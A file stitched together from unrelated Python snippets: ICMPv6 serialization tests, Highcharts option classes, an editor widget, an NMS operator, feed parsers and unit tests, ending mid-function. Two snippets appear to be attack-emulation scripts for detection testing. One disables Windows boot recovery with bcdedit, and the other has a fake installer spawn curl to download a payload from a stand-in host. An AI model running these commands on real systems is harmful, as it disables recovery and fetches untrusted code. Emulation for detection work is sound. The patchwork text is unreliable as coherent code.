        (msg, n, _) = icmpv6.icmpv6.parser(buf)
        eq_(msg.type_, self.type_)
        eq_(msg.code, self.code)
        eq_(msg.csum, self.csum)
        eq_(msg.data.id, self.id_)
        eq_(msg.data.seq, self.seq)
        eq_(msg.data.data, data)
        eq_(n, None)
    def test_parser_without_data(self):
        self._test_parser()
    def test_parser_with_data(self):
        self._test_parser(self.data)
    def _test_serialize(self, echo_data=None):
        # Serialize an echo over a synthetic IPv6 header, then unpack the
        # raw bytes and compare with the expected header fields/checksum.
        buf = (self.buf + (echo_data or b''))
        src_ipv6 = '3ffe:507:0:1:200:86ff:fe05:80da'
        dst_ipv6 = '3ffe:501:0:1001::2'
        prev = ipv6(6, 0, 0, len(buf), 64, 255, src_ipv6, dst_ipv6)
        echo_csum = icmpv6_csum(prev, buf)
        echo = icmpv6.echo(self.id_, self.seq, echo_data)
        icmp = icmpv6.icmpv6(self.type_, self.code, 0, echo)
        buf = six.binary_type(icmp.serialize(bytearray(), prev))
        (type_, code, csum) = struct.unpack_from(icmp._PACK_STR, buf, 0)
        (id_, seq) = struct.unpack_from(echo._PACK_STR, buf, icmp._MIN_LEN)
        data = buf[(icmp._MIN_LEN + echo._MIN_LEN):]
        # An empty trailing payload round-trips as None.
        data = (data if (len(data) != 0) else None)
        eq_(type_, self.type_)
        eq_(code, self.code)
        eq_(csum, echo_csum)
        eq_(id_, self.id_)
        eq_(seq, self.seq)
        eq_(data, echo_data)
    def test_serialize_without_data(self):
        self._test_serialize()
    def test_serialize_with_data(self):
        self._test_serialize(self.data)
    def test_to_string(self):
        # str()/repr() must render every field in declaration order.
        ec = icmpv6.echo(self.id_, self.seq, self.data)
        ic = icmpv6.icmpv6(self.type_, self.code, self.csum, ec)
        echo_values = {'id': self.id_, 'seq': self.seq, 'data': self.data}
        _echo_str = ','.join([('%s=%s' % (k, repr(echo_values[k]))) for (k, v) in inspect.getmembers(ec) if (k in echo_values)])
        echo_str = ('%s(%s)' % (icmpv6.echo.__name__, _echo_str))
        icmp_values = {'type_': repr(self.type_), 'code': repr(self.code), 'csum': repr(self.csum), 'data': echo_str}
        _ic_str = ','.join([('%s=%s' % (k, icmp_values[k])) for (k, v) in inspect.getmembers(ic) if (k in icmp_values)])
        ic_str = ('%s(%s)' % (icmpv6.icmpv6.__name__, _ic_str))
        eq_(str(ic), ic_str)
        eq_(repr(ic), ic_str)
    def test_default_args(self):
        # With csum=0 the serializer must compute the checksum itself.
        prev = ipv6(nxt=inet.IPPROTO_ICMPV6)
        ic = icmpv6.icmpv6(type_=icmpv6.ICMPV6_ECHO_REQUEST, data=icmpv6.echo())
        prev.serialize(ic, None)
        buf = ic.serialize(bytearray(), prev)
        res = struct.unpack(icmpv6.icmpv6._PACK_STR, six.binary_type(buf[:4]))
        eq_(res[0], icmpv6.ICMPV6_ECHO_REQUEST)
        eq_(res[1], 0)
        eq_(res[2], icmpv6_csum(prev, buf))
        res = struct.unpack(icmpv6.echo._PACK_STR, six.binary_type(buf[4:]))
        eq_(res[0], 0)
        eq_(res[1], 0)
    def test_json(self):
        # JSON round-trip must preserve the string representation.
        ec = icmpv6.echo(self.id_, self.seq, self.data)
        ic1 = icmpv6.icmpv6(self.type_, self.code, self.csum, ec)
        jsondict = ic1.to_jsondict()
        ic2 = icmpv6.icmpv6.from_jsondict(jsondict['icmpv6'])
        eq_(str(ic1), str(ic2))
class MessageStorageItem(StorageItem):
    """One conversation message persisted in storage, addressed by the
    pair ``(conv_uid, index)``."""

    def identifier(self) -> MessageIdentifier:
        """Return this item's storage identifier."""
        return self._id

    def __init__(self, conv_uid: str, index: int, message_detail: Dict):
        self.conv_uid = conv_uid
        self.index = index
        self.message_detail = message_detail
        # Identifier is derived once from the addressing pair.
        self._id = MessageIdentifier(conv_uid, index)

    def to_dict(self) -> Dict:
        """Serialize the item to a plain dict."""
        return dict(conv_uid=self.conv_uid, index=self.index,
                    message_detail=self.message_detail)

    def to_message(self) -> BaseMessage:
        """Reconstruct the BaseMessage from the stored detail dict."""
        return _message_from_dict(self.message_detail)

    def merge(self, other: 'StorageItem') -> None:
        """Adopt the message detail of *other* (must be the same item type)."""
        if isinstance(other, MessageStorageItem):
            self.message_detail = other.message_detail
        else:
            raise ValueError(f'Can not merge {other} to {self}')
def get_searcher(args, mode, data_path):
    """Instantiate the sequence searcher that implements *mode*.

    Returns None for the no-search / cache modes; raises EmapperException
    for an unrecognised mode.
    """
    if mode in (SEARCH_MODE_NO_SEARCH, SEARCH_MODE_CACHE):
        return None
    # Diamond and novel-families modes share the same searcher construction.
    if mode in (SEARCH_MODE_DIAMOND, SEARCH_MODE_NOVEL_FAMS):
        return DiamondSearcher(args, get_eggnog_dmnd_db(args.dmnd_db, mode, data_path))
    if mode == SEARCH_MODE_HMMER:
        return HmmerSearcher(args)
    if mode == SEARCH_MODE_MMSEQS2:
        return MMseqs2Searcher(args)
    raise EmapperException('Unknown search mode %s' % mode)
class OptionPlotoptionsBarSonificationDefaultinstrumentoptionsMappingPlaydelay(Options):
    # Accessor pairs for the Highcharts playDelay mapping sub-options.
    # NOTE(review): each name is defined twice (getter form then setter
    # form); as plain defs the second silently overrides the first.  This
    # matches a file-wide pattern of stripped @property / @name.setter
    # decorators -- confirm against the generated upstream source.
    def mapFunction(self):
        # Getter: mapping function (no default).
        return self._config_get(None)
    def mapFunction(self, value: Any):
        # Setter: mapping function.
        self._config(value, js_type=False)
    def mapTo(self):
        # Getter: data property to map to.
        return self._config_get(None)
    def mapTo(self, text: str):
        # Setter: data property to map to.
        self._config(text, js_type=False)
    def max(self):
        # Getter: maximum mapped value.
        return self._config_get(None)
    def max(self, num: float):
        # Setter: maximum mapped value.
        self._config(num, js_type=False)
    def min(self):
        # Getter: minimum mapped value.
        return self._config_get(None)
    def min(self, num: float):
        # Setter: minimum mapped value.
        self._config(num, js_type=False)
    def within(self):
        # Getter: range the mapping operates within.
        return self._config_get(None)
    def within(self, value: Any):
        # Setter: range the mapping operates within.
        self._config(value, js_type=False)
# NOTE(review): this is an Exo DSL hardware-instruction definition, not
# plain Python -- the string below was the argument of an @instr decorator
# (stripped by extraction) giving the C code emitted for the proc, and the
# `([f64][4] AVX2)` annotations are Exo window types.  It will not compile
# as ordinary Python.
('\n{out_data} = _mm256_blendv_pd ({z_data}, {y_data},\n_mm256_cmp_pd ({x_data}, {v_data}, _CMP_LT_OQ));\n')
def avx2_select_pd(out: ([f64][4] AVX2), x: ([f64][4] AVX2), v: ([f64][4] AVX2), y: ([f64][4] AVX2), z: ([f64][4] AVX2)):
    # All operands must be contiguous 4-lane AVX2 vectors.
    assert (stride(out, 0) == 1)
    assert (stride(x, 0) == 1)
    assert (stride(v, 0) == 1)
    assert (stride(y, 0) == 1)
    assert (stride(z, 0) == 1)
    # Lane-wise select: out[i] = y[i] if x[i] < v[i] else z[i]
    # (mapped to _mm256_blendv_pd / _mm256_cmp_pd in the instr string).
    for i in seq(0, 4):
        out[i] = select(x[i], v[i], y[i], z[i])
class OptionSeriesColumnrangeSonificationDefaultspeechoptionsMappingRate(Options):
    # Accessor pairs for the Highcharts speech-rate mapping sub-options.
    # NOTE(review): duplicated defs (getter then setter under one name)
    # indicate stripped @property / @name.setter decorators, as elsewhere
    # in this file; only the setter form survives at runtime as written.
    def mapFunction(self):
        # Getter: mapping function (no default).
        return self._config_get(None)
    def mapFunction(self, value: Any):
        # Setter: mapping function.
        self._config(value, js_type=False)
    def mapTo(self):
        # Getter: data property to map to.
        return self._config_get(None)
    def mapTo(self, text: str):
        # Setter: data property to map to.
        self._config(text, js_type=False)
    def max(self):
        # Getter: maximum mapped value.
        return self._config_get(None)
    def max(self, num: float):
        # Setter: maximum mapped value.
        self._config(num, js_type=False)
    def min(self):
        # Getter: minimum mapped value.
        return self._config_get(None)
    def min(self, num: float):
        # Setter: minimum mapped value.
        self._config(num, js_type=False)
    def within(self):
        # Getter: range the mapping operates within.
        return self._config_get(None)
    def within(self, value: Any):
        # Setter: range the mapping operates within.
        self._config(value, js_type=False)
class Origin(NamedTuple):
    """Leaf (callee name + port) at which a taint flow originates."""
    callee_name: Method
    callee_port: Port
    def from_json(leaf_json: Dict[(str, Any)], leaf_kind: str) -> 'Origin':
        # NOTE(review): no `self`/`cls` parameter -- almost certainly a
        # stripped @staticmethod decorator; confirm against upstream.
        # The callee may be identified by a method, a field, or a
        # canonical name, tried in that order.
        callee = leaf_json.get('method', leaf_json.get('field', leaf_json.get('canonical_name')))
        if (not callee):
            raise sapp.ParseError(f'No callee found in origin {leaf_json}.')
        callee_name = Method.from_json(callee)
        callee_port = Port.from_json('leaf', leaf_kind)
        # Canonical-name (CRTEX) origins carry an explicit port.
        if ('canonical_name' in leaf_json):
            callee_port = Port.from_json(leaf_json['port'], leaf_kind)
        if (not callee_port.is_leaf()):
            raise sapp.ParseError(f'Encountered non-leaf port in origin {leaf_json}')
        return Origin(callee_name, callee_port)
def detect_db_config(system=None):
    """Locate the BloodHound GUI config file and extract Neo4j credentials.

    Reads the platform-specific ``config.json`` and returns
    ``(username, password)``; ``username`` falls back to ``'neo4j'`` and
    ``password`` to ``None`` when absent from the file.  Returns
    ``(None, None)`` when a required environment variable is missing, the
    file cannot be read, the JSON is malformed, or the platform is not
    recognised.

    :param system: platform name as returned by ``platform.system()``;
        defaults to the current platform.  Added (backward-compatibly,
        with a default) so the lookup is testable per-platform.
    """
    if system is None:
        system = platform.system()
    if system == 'Windows':
        directory = os.environ.get('APPDATA')
        if directory is None:
            return (None, None)
        config = os.path.join(directory, 'BloodHound', 'config.json')
    elif system == 'Linux':
        directory = os.environ.get('XDG_CONFIG_HOME')
        if directory is None:
            home = os.environ.get('HOME')
            if home is None:
                return (None, None)
            directory = os.path.join(home, '.config')
        config = os.path.join(directory, 'bloodhound', 'config.json')
    elif system == 'Darwin':
        home = os.environ.get('HOME')
        if home is None:
            return (None, None)
        config = os.path.join(home, 'Library', 'Application Support',
                              'bloodhound', 'config.json')
    else:
        # BUG FIX: the original fell through with `configdata` unbound on
        # unrecognised platforms and raised NameError below.
        return (None, None)
    try:
        with open(config, 'r') as configfile:
            configdata = json.load(configfile)
    except (OSError, ValueError):
        # OSError covers a missing/unreadable file (the original's IOError);
        # ValueError (json.JSONDecodeError) covers a corrupt config file,
        # which previously crashed the caller.
        return (None, None)
    dbinfo = configdata.get('databaseInfo', {})
    username = dbinfo.get('user', 'neo4j')
    password = dbinfo.get('password')
    return (username, password)
# NOTE(review): bare `(IPythonEditor)` below is almost certainly the residue
# of a stripped `@provides(IPythonEditor)` class decorator.
(IPythonEditor)
class PythonEditor(MPythonEditor, LayoutWidget):
    """wx/Scintilla-based Python source editor widget (Pyface toolkit)."""
    # True when the buffer has unsaved modifications.
    dirty = Bool(False)
    # Path of the file shown in the editor.
    path = Str()
    # Whether the line-number margin is displayed.
    show_line_numbers = Bool(True)
    # Fired on any buffer change.
    changed = Event()
    # Fired with a KeyPressedEvent on each key press.
    key_pressed = Event(KeyPressedEvent)
    def __init__(self, parent=None, **traits):
        # `create` is a deprecated legacy flag: creating the widget in the
        # constructor is being phased out in favour of an explicit create().
        create = traits.pop('create', None)
        super().__init__(parent=parent, **traits)
        if create:
            self.create()
            warnings.warn('automatic widget creation is deprecated and will be removed in a future Pyface version, code should not pass the create parameter and should instead call create() explicitly', DeprecationWarning, stacklevel=2)
        elif (create is not None):
            warnings.warn('setting create=False is no longer required', DeprecationWarning, stacklevel=2)
    def load(self, path=None):
        """Load *path* (default: self.path) into the buffer; clears dirty."""
        if (path is None):
            path = self.path
        # An empty path yields an empty buffer.
        if (len(path) > 0):
            # NOTE(review): reads self.path rather than the local `path`
            # argument -- looks inconsistent with save(); confirm upstream.
            f = open(self.path, 'r')
            text = f.read()
            f.close()
        else:
            text = ''
        self.control.SetText(text)
        self.dirty = False
    def save(self, path=None):
        """Write the buffer to *path* (default: self.path); clears dirty."""
        if (path is None):
            path = self.path
        f = open(path, 'w')
        f.write(self.control.GetText())
        f.close()
        self.dirty = False
    def set_style(self, n, fore, back):
        # Apply foreground/background colours plus the fixed editor font to
        # Scintilla style slot `n`.
        self.control.StyleSetForeground(n, fore)
        self.control.StyleSetBackground(n, back)
        self.control.StyleSetFaceName(n, 'courier new')
        self.control.StyleSetSize(n, faces['size'])
    def select_line(self, lineno):
        """Select the whole of line *lineno*."""
        start = self.control.PositionFromLine(lineno)
        end = self.control.GetLineEndPosition(lineno)
        self.control.SetSelection(start, end)
        return
    def _path_changed(self):
        # Trait-change handler: delegate to the toolkit-independent hook.
        self._changed_path()
        return
    def _create_control(self, parent):
        """Create and configure the underlying PythonSTC widget."""
        self.control = stc = PythonSTC(parent, (- 1))
        stc.SetProperty('fold', '0')
        # Mark column 79 with a vertical edge line (PEP 8 width).
        stc.SetEdgeMode(wx.stc.STC_EDGE_LINE)
        stc.SetEdgeColumn(79)
        if self.show_line_numbers:
            stc.SetMarginType(1, wx.stc.STC_MARGIN_NUMBER)
            stc.SetMarginWidth(1, 45)
            self.set_style(wx.stc.STC_STYLE_LINENUMBER, '#000000', '#c0c0c0')
        else:
            # Keep a slim blank margin so the text does not touch the border.
            stc.SetMarginWidth(1, 4)
            self.set_style(wx.stc.STC_STYLE_LINENUMBER, '#ffffff', '#ffffff')
        # Spaces-only indentation, 4 wide, Unix line endings.
        stc.SetUseTabs(False)
        stc.SetIndent(4)
        stc.SetEOLMode(wx.stc.STC_EOL_LF)
        # Python syntax-highlighting palette (style slot -> fore/back).
        self.set_style(wx.stc.STC_STYLE_DEFAULT, '#000000', '#ffffff')
        self.set_style(wx.stc.STC_STYLE_CONTROLCHAR, '#000000', '#ffffff')
        self.set_style(wx.stc.STC_STYLE_BRACELIGHT, '#000000', '#ffffff')
        self.set_style(wx.stc.STC_STYLE_BRACEBAD, '#000000', '#ffffff')
        self.set_style(wx.stc.STC_P_DEFAULT, '#000000', '#ffffff')
        self.set_style(wx.stc.STC_P_COMMENTLINE, '#007f00', '#ffffff')
        self.set_style(wx.stc.STC_P_NUMBER, '#007f7f', '#ffffff')
        self.set_style(wx.stc.STC_P_STRING, '#7f007f', '#ffffff')
        self.set_style(wx.stc.STC_P_CHARACTER, '#7f007f', '#ffffff')
        self.set_style(wx.stc.STC_P_WORD, '#00007f', '#ffffff')
        self.set_style(wx.stc.STC_P_TRIPLE, '#7f0000', '#ffffff')
        self.set_style(wx.stc.STC_P_TRIPLEDOUBLE, '#ff0000', '#ffffff')
        self.set_style(wx.stc.STC_P_CLASSNAME, '#0000ff', '#ffffff')
        self.set_style(wx.stc.STC_P_DEFNAME, '#007f7f', '#ffffff')
        self.set_style(wx.stc.STC_P_OPERATOR, '#000000', '#ffffff')
        self.set_style(wx.stc.STC_P_IDENTIFIER, '#000000', '#ffffff')
        self.set_style(wx.stc.STC_P_COMMENTBLOCK, '#007f00', '#ffffff')
        self.set_style(wx.stc.STC_P_STRINGEOL, '#000000', '#ffffff')
        # Only report genuine text changes (insert/delete/undo/redo).
        stc.SetModEventMask((((wx.stc.STC_MOD_INSERTTEXT | wx.stc.STC_MOD_DELETETEXT) | wx.stc.STC_PERFORMED_UNDO) | wx.stc.STC_PERFORMED_REDO))
        stc.Bind(wx.stc.EVT_STC_CHANGE, self._on_stc_changed)
        stc.Bind(wx.EVT_CHAR, self._on_char)
        # Populate the buffer from self.path (if any).
        self.load()
        return stc
    def destroy(self):
        """Unbind event handlers before destroying the toolkit control."""
        if (self.control is not None):
            self.control.Unbind(wx.stc.EVT_STC_CHANGE)
            self.control.Unbind(wx.EVT_CHAR)
        super().destroy()
    def _on_stc_changed(self, event):
        # Buffer modified: mark dirty and fire the `changed` trait event.
        self.dirty = True
        self.changed = True
        event.Skip()
    def _on_char(self, event):
        # Translate the wx key event into a toolkit-independent trait event.
        self.key_pressed = KeyPressedEvent(alt_down=event.altDown, control_down=event.controlDown, shift_down=event.shiftDown, key_code=event.KeyCode, event=event)
        event.Skip()
        return
def load_environment_backend(env_backend: str) -> BackendAPI:
    """Load the hashing backend named by the ETH_HASH_BACKEND env variable.

    Raises ValueError for an unsupported backend name and ImportError (with
    install instructions) when the backend package is not installed.
    """
    # Guard clause: reject unknown names before attempting an import.
    if env_backend not in SUPPORTED_BACKENDS:
        raise ValueError(f"The backend specified in ETH_HASH_BACKEND, '{env_backend}', is not supported. Choose one of: {SUPPORTED_BACKENDS}")
    try:
        return load_backend(env_backend)
    except ImportError as e:
        raise ImportError(f"""The backend specified in ETH_HASH_BACKEND, '{env_backend}', is not installed. Install with `python -m pip install "eth-hash[{env_backend}]"`.""") from e
def confirm_email(nonce):
    """Render the e-mail confirmation page for confirmation token *nonce*.

    Returns the confirmed-page template on success, or an error page with
    HTTP status 400 when the token is unknown.
    """
    form = Form.confirm(nonce)
    if form:
        return render_template('forms/email_confirmed.html', email=form.email, host=form.host)
    return (render_template('error.html', title='Not a valid link', text='Confirmation token not found.<br />Please check the link and try again.'), 400)
class OptionPlotoptionsHeatmapOnpointConnectoroptions(Options):
    # Accessor pairs for the heatmap on-point connector line options.
    # NOTE(review): duplicated defs (getter then setter under one name)
    # indicate stripped @property / @name.setter decorators, consistent
    # with the rest of this file; only the setter form survives as written.
    def dashstyle(self):
        # Getter: dash style of the connector line (no default).
        return self._config_get(None)
    def dashstyle(self, text: str):
        # Setter: dash style of the connector line.
        self._config(text, js_type=False)
    def stroke(self):
        # Getter: stroke colour (no default).
        return self._config_get(None)
    def stroke(self, text: str):
        # Setter: stroke colour.
        self._config(text, js_type=False)
    def width(self):
        # Getter: line width, defaulting to 1.
        return self._config_get(1)
    def width(self, num: float):
        # Setter: line width.
        self._config(num, js_type=False)
def find_uncategorized_dataset_fields(existing_dataset: Optional[Dataset], source_dataset: Dataset) -> Tuple[(List[str], int)]:
    """List the fields of *source_dataset* that lack data categories.

    A field counts as categorized only when the matching collection of
    *existing_dataset* contains a field with the same name AND a non-empty
    ``data_categories``.  Returns ``(uncategorized_field_paths,
    total_field_count)`` where each path is
    ``"dataset.collection.field"``.
    """
    uncategorized = []
    field_total = 0
    for collection in source_dataset.collections:
        # Find the same-named collection in the existing dataset, if any.
        existing_collection = None
        if existing_dataset:
            for candidate in existing_dataset.collections:
                if candidate.name == collection.name:
                    existing_collection = candidate
                    break
        for field in collection.fields:
            field_total += 1
            if existing_collection:
                categorized = any(
                    existing_field.name == field.name and existing_field.data_categories
                    for existing_field in existing_collection.fields
                )
            else:
                # No existing collection: nothing can be categorized.
                categorized = False
            if not categorized:
                uncategorized.append(f'{source_dataset.name}.{collection.name}.{field.name}')
    return (uncategorized, field_total)
class batched_nms(Operator):
    """AITemplate operator performing batched non-maximum suppression.

    Consumes a tensor of boxes and produces an int64 tensor of kept
    indices; `iou_threshold` controls overlap rejection and `keep_n` the
    number of boxes retained (-1 appears to mean "no limit" -- confirm
    against the backend kernel).
    """
    def __init__(self, iou_threshold=0.5, keep_n=(- 1)) -> None:
        super().__init__()
        self._attrs['op'] = 'batched_nms'
        self._attrs['has_profiler'] = False
        self._attrs['keep_n'] = keep_n
        self._attrs['iou_threshold'] = iou_threshold
        self.exec_key_template = EXEC_KEY_TEMPLATE
    def _infer_shape(self, x: List[int]):
        # Output keeps only the leading (boxes) dimension of the input shape.
        return [x[0]]
    def _infer_shapes(self, x: Tensor):
        # Enumerate every concrete shape the (possibly dynamic) input can
        # take and collect the per-dimension value sets for the output.
        x_shape_values = [var._attrs['values'] for var in x._attrs['shape']]
        x_shapes = itertools.product(*x_shape_values)
        y_shapes = []
        for x_shape in x_shapes:
            y_shape = self._infer_shape(x_shape)
            y_shapes.append(y_shape)
        def unique(vector):
            # Deduplicate and sort candidate dimension values.
            return sorted(set(vector))
        output_shape = []
        for idx in range(len(y_shapes[0])):
            output_shape.append(shape_utils.gen_int_var(values=unique([d[idx] for d in y_shapes])))
        return output_shape
    def __call__(self, x: Tensor) -> Tensor:
        self._attrs['inputs'] = [x]
        self._set_depth()
        output_shape = self._infer_shapes(x)
        output = Tensor(output_shape, src_ops={self}, dtype='int64')
        # Scratch buffer: one 64-box bitmask column per box
        # (ceil(boxes_num / 64) * boxes_num words), zero-initialised on host.
        boxes_num = x._attrs['shape'][0]._attrs['values'][0]
        col_blocks = int((((boxes_num + 64) - 1) / 64))
        tmp_space = (col_blocks * boxes_num)
        tmp_c = _create_host_zero_tensor([IntImm(tmp_space)], dst_ops={self}, dtype='int64')
        self._attrs['inputs'].append(tmp_c)
        self._attrs['outputs'] = [output]
        return output
    def _get_op_attributes(self):
        # Attributes needed to reconstruct this op instance.
        return {'iou_threshold': self._attrs['iou_threshold'], 'keep_n': self._attrs['keep_n']}
    def gen_function(self) -> str:
        # Dispatch code generation to the backend registered for the
        # current compilation target.
        target = backend.target.Target.current()
        func_key = '{target}.{op}.gen_function'.format(target=target.name(), op=self._attrs['op'])
        func = registry.get(func_key)
        return func(self._attrs)
def data_cmap(data: pd.Series) -> Tuple:
    """Choose a matplotlib colormap appropriate for *data*.

    Infers the data family ('categorical', 'ordinal', 'continuous' or
    'divergent') and returns ``(cmap, data_family)``.

    Raises:
        ValueError: for >12 categorical levels, or (bug fix) for an
            unrecognised data family -- previously an unknown family left
            ``cmap`` unbound and raised an opaque NameError on return.
    """
    data_family = infer_data_family(data)
    if (data_family == 'categorical'):
        base_cmap = qualitative
        # colorbrewer's Set3 needs at least 3 and at most 12 classes.
        num_categories = max(len(data.unique()), 3)
        if (num_categories > 12):
            raise ValueError(f"It appears you have >12 categories for the key {data.name}. Because it's difficult to discern >12 categories, and because colorbrewer doesn't have a qualitative colormap with greater than 12 categories, nxviz does not support plotting with >12 categories.")
        cmap = ListedColormap(base_cmap.__dict__[f'Set3_{num_categories}'].mpl_colors)
    elif (data_family in ('ordinal', 'continuous')):
        # Ordinal and continuous data both use the perceptually-uniform map.
        cmap = get_cmap('viridis')
    elif (data_family == 'divergent'):
        cmap = get_cmap('bwr')
    else:
        # BUG FIX: previously fell through with `cmap` unbound (NameError).
        raise ValueError(f'Unsupported data family: {data_family}')
    return (cmap, data_family)
def _derive_pbkdf_key(crypto: Dict[(str, Any)], password: str) -> bytes:
    """Derive the encryption key for a keyfile using PBKDF2.

    Reads salt, derived-key length, iteration count and the PRF name
    ('hmac-<hash>') from ``crypto['kdfparams']``.

    Raises:
        ValueError: if the prf is not an HMAC-based PRF.  (Bug fix: the
            original used `assert`, which is stripped under `python -O`
            and would silently accept a malformed prf.)
    """
    kdf_params = crypto['kdfparams']
    salt = decode_hex(kdf_params['salt'])
    dklen = kdf_params['dklen']
    (should_be_hmac, _, hash_name) = kdf_params['prf'].partition('-')
    if should_be_hmac != 'hmac':
        raise ValueError(f"Unsupported prf in kdfparams: {kdf_params['prf']!r}; expected 'hmac-<hash>'")
    iterations = kdf_params['c']
    derive_pbkdf_key = _pbkdf2_hash(password, hash_name, salt, iterations, dklen)
    return derive_pbkdf_key
def extractBluebugsstory(item):
    """Map a bluebugsstory feed *item* to a release message.

    Emits a 'WATTT' release when the title parses to a chapter/volume and
    the item is tagged accordingly; returns False otherwise (including for
    preview posts).
    """
    (vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title'])
    has_release_info = (chp or vol) and 'preview' not in item['title'].lower()
    if not has_release_info:
        return False
    if 'WATTT' in item['tags']:
        return buildReleaseMessageWithType(item, 'WATTT', vol, chp, frag=frag, postfix=postfix)
    return False
# NOTE(review): residue of a stripped platform-restriction decorator.
_os(*metadata.platforms)
def main():
    """Emulate boot-configuration tampering: export the BCD store, disable
    recovery/failure handling, then restore the original configuration."""
    common.log('Exporting the boot configuration....')
    bcdedit = 'bcdedit.exe'
    backup_file = Path('boot.cfg').resolve()
    common.execute([bcdedit, '/export', backup_file])
    common.log('Changing boot configuration', log_type='!')
    # The two settings attackers typically flip to hinder recovery.
    for option, value in (('bootstatuspolicy', 'ignoreallfailures'),
                          ('recoveryenabled', 'no')):
        common.execute([bcdedit, '/set', '{current}', option, value])
    common.log(('Restoring boot configuration from %s' % backup_file), log_type='-')
    common.execute([bcdedit, '/import', backup_file])
class Calendar(Html.Html):
    """Epyk wrapper for the Toast UI ``tui-calendar`` JavaScript component.

    NOTE(review): `var`, `options` and `js` read like @property getters
    whose decorators were stripped (consistent with the rest of this
    file); e.g. __init__ does `self.options.height = ...`, which only
    works if `options` is a property.  Confirm against upstream.
    """
    name = 'ToastCalendar'
    # JavaScript dependencies pulled in by the page builder.
    requirements = ('tui-calendar',)
    _option_cls = OptToastCalendar.OptionCalendar
    def __init__(self, page, width, height, html_code, options, profile):
        self.height = height[0]
        super(Calendar, self).__init__(page, [], html_code=html_code, profile=profile, options=options, css_attrs={'width': width, 'height': height})
        self.options.height = height[0]
    def var(self):
        # JavaScript variable name holding the calendar instance.
        return ("window['%s']" % self.htmlCode)
    def options(self) -> OptToastCalendar.OptionCalendar:
        # Typed accessor over the component options.
        return super().options
    def js(self) -> JsToastCalendar.Calendar:
        # Lazily-created JavaScript API facade for this component.
        if (self._js is None):
            self._js = JsToastCalendar.Calendar(component=self, js_code=self.var, page=self.page)
        return self._js
    # JS snippet run by the page builder to instantiate the widget.
    _js__builder__ = 'window[htmlObj.id] = new tui.Calendar(htmlObj, options)'
    def __str__(self):
        # Register the builder JS, then emit the placeholder div.
        self.page.properties.js.add_builders(self.build())
        return ('<div %(attrs)s></div>' % {'attrs': self.get_attrs(css_class_names=self.style.get_classes())})
# NOTE(review): residue of a stripped platform-restriction decorator.
_os(*metadata.platforms)
def main():
    """Emulate a fake macOS installer spawning a fake curl to fetch a
    payload from an AWS-like URL, then clean up the masquerade binaries."""
    installer = '/tmp/Installer'
    fake_curl = '/tmp/curl'
    for masq in (installer, fake_curl):
        common.create_macos_masquerade(masq)
    common.log('Launching fake macOS installer commands to download payload')
    common.execute([installer], timeout=10, kill=True)
    command = f'{fake_curl} test.amazonaws.comtest '
    common.execute([installer, 'childprocess', command], timeout=10, kill=True)
    for masq in (installer, fake_curl):
        common.remove_file(masq)
def extractCabnovelsWordpressCom(item):
    """Map a cabnovels.wordpress.com feed *item* to a release message.

    Emits a 'Xyrin Empire' release when the item is tagged or its title
    uses one of the known prefixes; returns None for non-chapter/preview
    posts and False for unrecognised items.
    """
    (vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title'])
    title = item['title']
    if not (chp or vol) or 'preview' in title.lower():
        return None
    # Tag match or either known title prefix identifies the series.
    if ('xi ling empire' in item['tags']) or title.startswith(('XE ', '(Ch.')):
        return buildReleaseMessageWithType(item, 'Xyrin Empire', vol, chp, frag=frag, postfix=postfix)
    return False
class TestContest(object):
    """Integration test for contest setup over a simulated server + clients.

    Relies on a gevent-driven event loop: `wait()` flushes pending server
    traffic and short `gevent.sleep` calls yield so asynchronous events
    land in the EventTap before the assertions run.
    """
    def testContest(self):
        env = Environ()
        t = EventTap()
        s = env.server_core()
        proton = env.client_core()
        # Five additional clients; d logs in late on purpose (see below).
        (a, b, c, d, e) = [env.client_core() for _ in range(5)]
        t.tap(proton, a, b, c, d, e)
        proton.auth.login('Proton')
        a.auth.login('Alice')
        b.auth.login('Bob')
        c.auth.login('Cirno')
        e.auth.login('Eirin')
        wait()
        assert (proton.auth.pid == 2)
        assert (a.auth.pid > 0)
        assert (b.auth.pid > 0)
        assert (c.auth.pid > 0)
        assert (e.auth.pid > 0)
        # A 2v2 contest with only two players must be rejected.
        proton.contest.setup('TestContest', 'THBattle2v2', [a.auth.pid, b.auth.pid])
        wait()
        assert (t.take(proton.events.server_error) == 'wrong_players_count')
        assert (a.events.game_joined not in t)
        assert (b.events.game_joined not in t)
        # Put b into a running game (with c observing) so the later contest
        # setup must pull b out of it.
        b.room.create('Wow', 'THBattleNewbie', {})
        wait()
        s.observe.add_bigbrother(c.auth.pid)
        b.room.get_ready()
        c.observe.observe(b.auth.pid)
        wait()
        assert (b.events.game_started in t)
        assert (c.events.game_started in t)
        t.clear()
        # Valid 4-player contest; Daiyousei is named but not yet logged in.
        proton.contest.setup('TestContest', 'THBattleDummy4', ([i.auth.pid for i in (a, b, c)] + [s.backend.pid_of('Daiyousei')]))
        wait()
        assert (a.events.game_joined in t)
        # b is still inside its own game; d/e are not (yet) participants.
        assert (b.events.game_joined not in t)
        assert (c.events.game_joined in t)
        assert (d.events.game_joined not in t)
        assert (e.events.game_joined not in t)
        # Late login of an invited player should auto-join the contest.
        d.auth.login('Daiyousei')
        wait()
        gevent.sleep(0.02)
        assert (d.events.game_joined in t)
        # Leaving the old game should pull b into the contest as well.
        b.room.leave()
        wait()
        gevent.sleep(0.02)
        assert (b.events.game_joined in t)
        # Non-competitors may not join the contest room.
        gid = a.game.gid_of(t[a.events.game_joined])
        e.room.join(gid)
        wait()
        assert (t.take(e.events.server_error) == 'not_competitor')
        t.clear()
        a.room.get_ready()
        b.room.get_ready()
        c.room.get_ready()
        d.room.get_ready()
        wait()
class Test_SlidingWindow():
    """Unit tests for SlidingWindow range bookkeeping and staleness logic."""

    def test_constructor(self):
        win = SlidingWindow(10.1, 20.2, 30.3)
        assert win.before == 10.1
        assert win.after == 20.2
        assert win.expires == 30.3

    def test_has_ranges_including_the_value(self):
        # A timestamp inside the window must fall within every range.
        stamp = 6
        win = SlidingWindow(10, 5, 30)
        spans = win.ranges(stamp)
        assert len(spans) == 1
        for span in spans:
            assert span[0] <= stamp
            assert span[1] > stamp

    def test_current_range_is_latest_range(self):
        stamp = 456
        win = SlidingWindow(57, 23, 30)
        spans = win.ranges(stamp)
        assert win.current(stamp) == spans[-1]

    def test_earliest_range_is_first_range(self):
        stamp = 3223
        win = SlidingWindow(100, 15, 30)
        spans = win.ranges(stamp)
        assert win.earliest(stamp) == spans[0]

    def test_non_stale_timestamp(self):
        # Every moment inside the expiry horizon is fresh.
        expires = 20
        now = 60
